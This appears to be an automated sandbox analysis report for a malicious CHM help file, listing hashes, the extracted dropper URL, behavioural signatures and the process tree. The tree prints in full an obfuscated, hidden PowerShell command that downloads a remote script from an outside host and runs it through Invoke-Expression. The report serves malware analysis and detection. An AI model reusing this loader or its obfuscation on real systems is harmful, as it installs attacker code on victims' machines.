Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    169s
  • max time network
    193s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    08/10/2023, 01:29

General

  • Target

    QJA_2023.05-22_Q_16-25.chm

  • Size

    11KB

  • MD5

    5f36f1a3b78d286033a6dac8340446ee

  • SHA1

    6659d0703128dc55bd9776f3fd909f301650ae10

  • SHA256

    0a7186e481d3a29e2ff9b60e937e389ea0d2a69aa513f1fb2d66a000601482fb

  • SHA512

    57b734d05a665996258885e4d7a3171e70b30195f65ada04e4487995dc1968266bff8b0f9931750e2894650e0fda98d4c879b21df0fed7aaf046512631f1c825

  • SSDEEP

    96:APcU9sWLZI1rqc4MTz9XTeNq73QNQyd2HyNLqxOb4:APJ9O2M39XQqDIQuOy

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://tijunaitiene.lt/x99.txt

Signatures

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\QJA_2023.05-22_Q_16-25.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://tijunaitiene.lt/x99.txt')|P
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2416-9-0x000000001B260000-0x000000001B542000-memory.dmp

    Filesize

    2.9MB

  • memory/2416-10-0x0000000002420000-0x0000000002428000-memory.dmp

    Filesize

    32KB

  • memory/2416-11-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-12-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-13-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-14-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-15-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-16-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-17-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-18-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-19-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-20-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-21-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-22-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB